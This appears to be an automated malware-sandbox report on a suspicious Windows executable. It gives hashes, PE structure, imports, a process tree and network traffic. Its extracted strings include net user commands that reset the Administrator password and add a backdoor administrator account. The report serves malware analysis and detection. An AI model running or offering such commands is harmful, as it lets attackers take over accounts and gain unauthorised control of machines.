Analysis task

Analysis type   VM label                   Start time           End time             Duration
File (Windows)  win7-sp1-x64-shaapp03-2    2021-04-21 21:41:57  2021-04-21 21:44:00  123 seconds

Maldun score

3.75

Suspicious

File details

File name   你看看.exe
File size   658566 bytes
File type   PE32 executable (GUI) Intel 80386, for MS Windows
MD5         7e27ac9e820d387dded0c1b2757e1420
SHA1        ec17ebfd30e2a463c96c2e3ef9d0c33355ad9fa4
SHA256      92533ccf75913058b3d68e369a55c80a1818bb7bb53921585bad408bd6c90d9f
SHA512      dd349949b1f2ff4dfd90c842d27fdc82c6dc5ef485f4d777784d24769336dc0adcf698bd22ff405a657379612ded55020a2d5ed2fb19b1eba0854b3ecaa09e38
CRC32       FBE40411
Ssdeep      12288:EhGCyqSA26tTigiyv22zrREO2BGayHK8RU6ER6vFsRgRTsc/znDLlUoQh6S1:Eh7yqxdN748KlBoHK8ROislc/zDL4r1

Runtime screenshots


Host access records

No host records.

Domain resolution

Domain             Safety rating  Response
acroipm.adobe.com                 CNAME acroipm.adobe.com.edgesuite.net
                                  CNAME a1983.dscd.akamai.net
                                  A 104.75.169.10
                                  A 104.75.169.8

PE information

Image base                   0x00400000
Entry point                  0x00403861
Declared checksum            0x00000000
Actual checksum              0x000af2c4
Minimum OS version required  4.0
Compile time                 1972-12-25 13:33:23
Import hash                  9165ea3e914e03bda3346f13edbd6ccd
Icon exact hash              7e8d0dbe5de19f74f384ae459c5abecf
Icon similarity hash         439e81c5165936c3ea55d4df339c6380

Version information

LegalCopyright
FileVersion
Comments
ProductName
ProductVersion
FileDescription
Translation

PE sections

Name   Virtual address  Virtual size  Raw data size  Characteristics  Entropy
.text 0x00001000 0x00004dcc 0x00005000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.52
.rdata 0x00006000 0x00000a4a 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 3.56
.data 0x00007000 0x00001f58 0x00002000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 2.86
.data 0x00009000 0x00001000 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 1.14
.rsrc 0x0000a000 0x00001048 0x00002000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.39

Overlay

Offset  0x0000c000
Size    0x00094c86

Resources

Name  Offset  Size  Language  Sublanguage  Entropy  File type
RT_ICON 0x0000a5a0 0x00000668 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.62 dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
RT_ICON 0x0000a5a0 0x00000668 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.62 dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
RT_ICON 0x0000a5a0 0x00000668 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.62 dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
RT_GROUP_ICON 0x0000ac08 0x00000030 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.71 MS Windows icon resource - 3 icons, 16x16, 16 colors
RT_VERSION 0x0000ac38 0x00000240 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.83 data
RT_MANIFEST 0x0000ae78 0x000001cd LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 5.08 XML 1.0 document, ASCII text, with very long lines, with no line terminators

Imports

Library: KERNEL32.dll:
0x406000 GetProcAddress
0x406004 LoadLibraryA
0x406008 CloseHandle
0x40600c WriteFile
0x406010 CreateDirectoryA
0x406014 GetTempPathA
0x406018 ReadFile
0x40601c SetFilePointer
0x406020 CreateFileA
0x406024 GetModuleFileNameA
0x406028 GetStringTypeA
0x40602c LCMapStringW
0x406030 LCMapStringA
0x406034 HeapAlloc
0x406038 HeapFree
0x40603c GetModuleHandleA
0x406040 GetStartupInfoA
0x406044 GetCommandLineA
0x406048 GetVersion
0x40604c ExitProcess
0x406050 HeapDestroy
0x406054 HeapCreate
0x406058 VirtualFree
0x40605c VirtualAlloc
0x406060 HeapReAlloc
0x406064 TerminateProcess
0x406068 GetCurrentProcess
0x406078 WideCharToMultiByte
0x406084 SetHandleCount
0x406088 GetStdHandle
0x40608c GetFileType
0x406090 RtlUnwind
0x406094 GetCPInfo
0x406098 GetACP
0x40609c GetOEMCP
0x4060a0 MultiByteToWideChar
0x4060a4 GetStringTypeW
Library: USER32.dll:
0x4060ac MessageBoxA
0x4060b0 wsprintfA

.text
`.rdata
@.data
.data
.rsrc
u hxb@
YYh p@
DSUVWh
SVWUj
[Sh,f@
"WWSh(f@
^Vh,f@
PVh(f@
runtime error
Microsoft Visual C++ Runtime Library
Program:
<program name unknown>
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
GetProcAddress
LoadLibraryA
CloseHandle
WriteFile
CreateDirectoryA
GetTempPathA
ReadFile
SetFilePointer
CreateFileA
GetModuleFileNameA
KERNEL32.dll
MessageBoxA
wsprintfA
USER32.dll
HeapAlloc
HeapFree
GetModuleHandleA
GetStartupInfoA
GetCommandLineA
GetVersion
ExitProcess
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
HeapReAlloc
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
RtlUnwind
GetCPInfo
GetACP
GetOEMCP
MultiByteToWideChar
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
Error
Failed to read data from the file!
Failed to read file or invalid data in file!
Invalid data in the file!
The interface of kernel library is invalid!
The kernel library is invalid!
GetNewSock
Failed to load kernel library!
Not found the kernel library!
krnln.fne
krnln.fnr
Failed to decompress data!
Insufficient memory!
E_N%X
Can't retrieve the temporary directory!
Can't open file!
invalid bit length repeat
too many length or distance symbols
invalid stored block lengths
invalid block type
invalid distance code
invalid literal/length code
1.1.3
need dictionary
incorrect data check
incorrect header check
invalid window size
unknown compression method
incomplete dynamic bit lengths tree
oversubscribed dynamic bit lengths tree
incomplete literal/length tree
oversubscribed literal/length tree
empty distance tree with lengths
incomplete distance tree
oversubscribed distance tree
incompatible version
buffer error
insufficient memory
data error
stream error
file error
stream end
const
net user Administrator zzyyyds
net user zzyyyds 666666 /add
net localgroup administrators 666666 /add
@reloc1
wwwwwwwwwwwwwwwwwwwwwwww
O(uckHr
4 Kgx
yyzTi
~.Eq=
TUXy%
VS_VERSION_INFO
StringFileInfo
080404B0
FileVersion
1.0.0.0
FileDescription
ProductName
ProductVersion
1.0.0.0
LegalCopyright
Comments
(http://www.eyuyan.com)
VarFileInfo
Translation
No antivirus engine scan information!

Process tree

_________.exe, PID: 2540, parent PID: 2232
net.exe, PID: 2696, parent PID: 2540
net.exe, PID: 2740, parent PID: 2540
net.exe, PID: 2792, parent PID: 2540
net1.exe, PID: 2996, parent PID: 2740
net1.exe, PID: 2892, parent PID: 2696
net1.exe, PID: 3048, parent PID: 2792

TCP

Source address   Source port  Destination address              Destination port
192.168.122.202  49166        104.75.169.10 acroipm.adobe.com  80

UDP

Source address   Source port  Destination address  Destination port
192.168.122.202  50785        192.168.122.1        53

HTTP requests

URI  HTTP data
http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip
GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1
Accept: */*
If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT
User-Agent: IPM
Host: acroipm.adobe.com
Connection: Keep-Alive
Cache-Control: no-cache

SMTP traffic

No SMTP traffic.

IRC traffic

No IRC requests.

ICMP traffic

No ICMP traffic.

CIF report

No CIF results

Network alerts

No alerts

TLS

No TLS

Suricata HTTP

No Suricata HTTP

No files extracted from network traffic.
No files were dropped.
No similar analyses found.

Processing ( 14.662 seconds )

  • 10.451 Suricata
  • 1.557 VirusTotal
  • 0.764 NetworkAnalysis
  • 0.696 Static
  • 0.426 peid
  • 0.359 TargetInfo
  • 0.205 BehaviorAnalysis
  • 0.19 Strings
  • 0.011 AnalysisInfo
  • 0.002 Memory
  • 0.001 config_decoder

Signatures ( 1.492 seconds )

  • 1.326 md_url_bl
  • 0.016 antiav_detectreg
  • 0.011 api_spamming
  • 0.01 md_domain_bl
  • 0.008 stealth_timeout
  • 0.007 stealth_decoy_document
  • 0.007 mimics_filetime
  • 0.007 reads_self
  • 0.007 infostealer_ftp
  • 0.006 stealth_file
  • 0.006 antivm_generic_disk
  • 0.006 virus
  • 0.005 bootkit
  • 0.005 anomaly_persistence_autorun
  • 0.005 antiav_detectfile
  • 0.004 geodo_banking_trojan
  • 0.004 infostealer_bitcoin
  • 0.004 infostealer_im
  • 0.004 ransomware_extensions
  • 0.004 ransomware_files
  • 0.003 maldun_anomaly_massive_file_ops
  • 0.003 antianalysis_detectreg
  • 0.003 infostealer_mail
  • 0.003 network_http
  • 0.002 tinba_behavior
  • 0.002 hancitor_behavior
  • 0.002 antivm_vbox_files
  • 0.002 disables_browser_warn
  • 0.002 network_torgateway
  • 0.001 rat_nanocore
  • 0.001 maldun_malicious_write_executeable_under_temp_to_regrun
  • 0.001 rat_luminosity
  • 0.001 maldun_anomaly_write_exe_and_obsfucate_extension
  • 0.001 betabot_behavior
  • 0.001 kibex_behavior
  • 0.001 shifu_behavior
  • 0.001 maldun_anomaly_write_exe_and_dll_under_winroot_run
  • 0.001 cerber_behavior
  • 0.001 antivm_parallels_keys
  • 0.001 antivm_xen_keys
  • 0.001 bot_drive
  • 0.001 bot_drive2
  • 0.001 browser_security
  • 0.001 modify_proxy
  • 0.001 maldun_malicious_drop_executable_file_to_temp_folder
  • 0.001 md_bad_drop
  • 0.001 network_cnc_http

Reporting ( 0.568 seconds )

  • 0.509 ReportHTMLSummary
  • 0.059 Malheur
Task ID 631862
Mongo ID 60802c377e769a0f72493b73
Cuckoo release 1.4-Maldun